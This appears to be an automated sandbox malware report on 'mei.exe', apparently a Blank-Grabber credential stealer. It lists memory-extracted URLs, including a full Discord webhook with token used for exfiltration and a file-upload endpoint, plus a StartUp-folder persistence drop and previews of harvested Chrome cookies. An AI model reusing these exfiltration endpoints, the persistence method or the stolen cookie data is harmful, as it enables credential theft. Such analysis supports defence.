00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://www.python.org/download/releases/2.3/mro/.mei.exe, 00000001.00000002.2030942122.000002E913490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://discordapp.com/api/v9/users/mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://ip-api.com/json/?fields=225545rmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/urllib3/urllib3/issues/2920mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906554913.000002E914B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://yahoo.com/mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://account.bellmedia.cmei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.microsoftonline.commei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2037321445.000002E9155C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cacerts.digicert.comei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1Hamei.exe, 00000001.00000002.2035693099.000002E914310000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://html.spec.whatwg.org/multipage/mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsmei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.zhihu.com/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://contoso.com/powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://oneget.orgXpowershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.iana.org/time-zones/repository/tz-link.htmlmei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678406179.000002E913C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://api.gofile.io/getServermei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://media.discordapp.net/attachments/1180990520542105673/1181873826842284133/Blank-user.rar?ex=mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngmei.exe, 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E914008000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031449289.000002E9139D0000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FB7000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • 2%, Virustotal, Browse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.eclipse.org/0mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://sectigo.com/CPS0mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1654022915.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653329931.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653092654.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://go.micmei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icomei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.amazon.co.uk/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://ocsp.thawte.com0mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • 2%, Virustotal, Browse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://json.orgmei.exe, 00000001.00000003.1678406179.000002E913C2E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.wykop.pl/mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    208.95.112.1
                                                                                                                                                                    		ip-api.comUnited States
                                                                                                                                                                    		53334TUT-ASUSfalse
                                                                                                                                                                    162.159.136.232
                                                                                                                                                                    		discord.comUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUStrue

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox version:38.0.0 Ammolite
                                                                                                                                                                    Analysis ID:1354458
                                                                                                                                                                    Start date and time:2023-12-06 09:23:12 +01:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 13m 2s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:109
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:mei.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@174/116@3/2
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 60%
                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.253.63.94, 172.253.63.120
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, crl.comodoca.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8228 because it is empty
                                                                                                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    09:24:05API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                    09:24:06API Interceptor113x Sleep call for process: powershell.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    No context

                                                                                                                                                                    Domains

                                                                                                                                                                    No context

                                                                                                                                                                    ASNs

                                                                                                                                                                    No context

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8593769
                                                                                                                                                                    Entropy (8bit):7.994244096439802
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:196608:7x0cD9zMLjv+bhqNVoBKUh8mz4Iv9PzQ1u1D7wJM:Ki9zcL+9qz8/b4IC1uRmM
                                                                                                                                                                    MD5:B5479BF5C97CFA81C02676BB9335AB24
                                                                                                                                                                    SHA1:E823A36420BDECCFD8E4C6AD9D14E863263CAAC7
                                                                                                                                                                    SHA-256:02C36B712AEAAD34359C72311C8624062EA5DFC6311A15ED2B46B403470C3BC0
                                                                                                                                                                    SHA-512:7FD4DAC8048BB1952F479BD14E32D0CECED93A546AE1C966FEF0710CF195F45DA077E045C3B383F6C8E3151F27B7C63B1906080102640F704EFB6319B7142ACF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y~M..-M..-M..-...,E..-...,...-...,G..-X..-I..-X..,e..-X..,\..-X..,D..-...,F..-M..-..-t..,X..-t..,L..-RichM..-........................PE..d...m.ne.........."....%.....r.................@....................................>&....`.....................................................x....`..L.... ..."..!...H$...p..\...0..................................@............... ............................text...@........................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...L....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Credentials\Chrome\Chrome Cookies.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3343
                                                                                                                                                                    Entropy (8bit):5.859453163399709
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksy:NFFRiNEUdC
                                                                                                                                                                    MD5:3A53152A5A407F6FFC00ACCAF475ACA7
                                                                                                                                                                    SHA1:535A984DD89A56CA94FC1E77D4EC8B5E5F6AD6F5
                                                                                                                                                                    SHA-256:8DF02145633200812938312EE054F6686D60CC7C11B3C17E2492AAE545907A2C
                                                                                                                                                                    SHA-512:85A269B5BDF1C8B6CBBAA79756A9BCECCF18A3EE76518D7DC77223689B9FE9D48E0C079A87AB7F3EAD8A8FD35091E2C3F6EB83E66C3F61F83F57A262273904FA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Credentials\Chrome\Chrome History.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                    Entropy (8bit):5.070419477168993
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:wqMYcQpMYcHVVpbcYcHScpbcYcqjmcowmmcHVcDKJUmcHVuDKJUmc:wqMYclYcHdcYcHncYcqjmcowmmcHaDKH
                                                                                                                                                                    MD5:865C89CE71E816B7B6319F59623A1364
                                                                                                                                                                    SHA1:689E9954DA13A6445D4C31DD71CDE397A87EC3B8
                                                                                                                                                                    SHA-256:9CEC61477EB6A1A43BE5E81F018FE2B8145B1601DEED31B65FDEE337A1385856
                                                                                                                                                                    SHA-512:17C51EC2CF065E9ED7A3B8F5EC42D5B5912790456C4A22BEDFB7D93F4CC6E607AE1889E54DAEC356BF3FEB655F93C811F081361C38625F38966EA83F4533FDF4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
